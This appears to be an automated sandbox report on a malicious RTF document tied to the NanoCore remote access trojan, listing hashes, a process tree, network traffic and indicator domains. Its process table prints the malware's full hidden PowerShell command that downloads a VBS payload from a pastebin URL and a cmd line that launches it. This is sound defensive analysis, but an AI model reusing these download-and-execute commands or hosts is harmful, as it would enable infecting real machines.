File name: | 17cc5ab80cf22229ae31ed51367951a0 |
Full analysis: | https://app.any.run/tasks/ca1aad7d-4c29-4c85-a443-1e1c81237dd1 |
Verdict: | Malicious activity |
Threats: | NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website. |
Analysis date: | July 18, 2019, 05:34:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 17CC5AB80CF22229AE31ED51367951A0 |
SHA1: | 4F0B305E1A94BF66A9D4207844B3BFDFA76D5780 |
SHA256: | 49396AD1A758120FEE92C7459CBBBB3738AA229F068C516B6919C602F7C654CE |
SSDEEP: | 12288:Q2gLaSYdHnVcvDsLfafj4zjVl2uvwuLFKMxmMjaccouFfm:zgLa9nO4fab0jVlpwiFhn9coH |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 107 |
---|---|
CharactersWithSpaces: | 546 |
Characters: | 466 |
Words: | 81 |
Pages: | 1 |
TotalEditTime: | 2 minutes |
RevisionNumber: | 2 |
ModifyDate: | 2019:07:17 10:07:00 |
CreateDate: | 2019:07:17 13:04:00 |
LastModifiedBy: | Joselio Bonin |
Author: | felipemkt894 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3532 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\17cc5ab80cf22229ae31ed51367951a0.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 1 Version: 14.0.6024.1000 | ||||
3872 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3576 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/NTkwkW4i','C:\Users\Public\AvastUI.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3948 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AvastUI.vbs | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2500 | ping 127.0.0.1 -n 10 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3232 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
308 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object Net.WebClient).DownloadFile('https://pastebin.com/raw/NTkwkW4i','C:\Users\Public\AvastUI.vbs') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2592 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & start ,C:\Users\Public\AvastUI.vbs | C:\Windows\System32\cmd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2868 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2176 | ping 127.0.0.1 -n 10 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3532 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC5FF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3872 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRCE7B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3872 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF1C92D99DE6A0E350.TMP | — | |
MD5:— | SHA256:— | |||
3232 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRD419.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3576 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SMA896DKF62FX04PVYPC.temp | — | |
MD5:— | SHA256:— | |||
3232 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFE3F9D2AC97DD9E39.TMP | — | |
MD5:— | SHA256:— | |||
2868 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRD7E1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
308 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MU7QECVX9A9GV55VRUM9.temp | — | |
MD5:— | SHA256:— | |||
3576 | powershell.exe | C:\Users\Public\AvastUI.vbs | — | |
MD5:— | SHA256:— | |||
2868 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFF4E60BDAC3E303E6.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3916 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15628657201.jpg | CA | text | 945 Kb | malicious |
2980 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15628657201.jpg | CA | text | 945 Kb | malicious |
3644 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15633406891.jpg | CA | text | 1.22 Mb | malicious |
2044 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15633406891.jpg | CA | text | 1.22 Mb | malicious |
956 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15628657201.jpg | CA | text | 945 Kb | malicious |
3916 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15633406891.jpg | CA | text | 1.22 Mb | malicious |
3112 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15628657201.jpg | CA | text | 945 Kb | malicious |
3644 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15628657201.jpg | CA | text | 945 Kb | malicious |
2980 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15633406891.jpg | CA | text | 1.22 Mb | malicious |
3152 | Powershell.exe | GET | 200 | 158.69.18.61:80 | http://www.m9c.net/uploads/15628657201.jpg | CA | text | 945 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3636 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3576 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2492 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3272 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
1824 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3660 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
308 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
1692 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3480 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
3276 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
www.m9c.net |
| malicious |
soucdtevoceumcuzao.duckdns.org |
| malicious |
bylgay.hopto.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3320 | InstallUtil.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
3320 | InstallUtil.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
3320 | InstallUtil.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
3320 | InstallUtil.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
3320 | InstallUtil.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
3320 | InstallUtil.exe | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |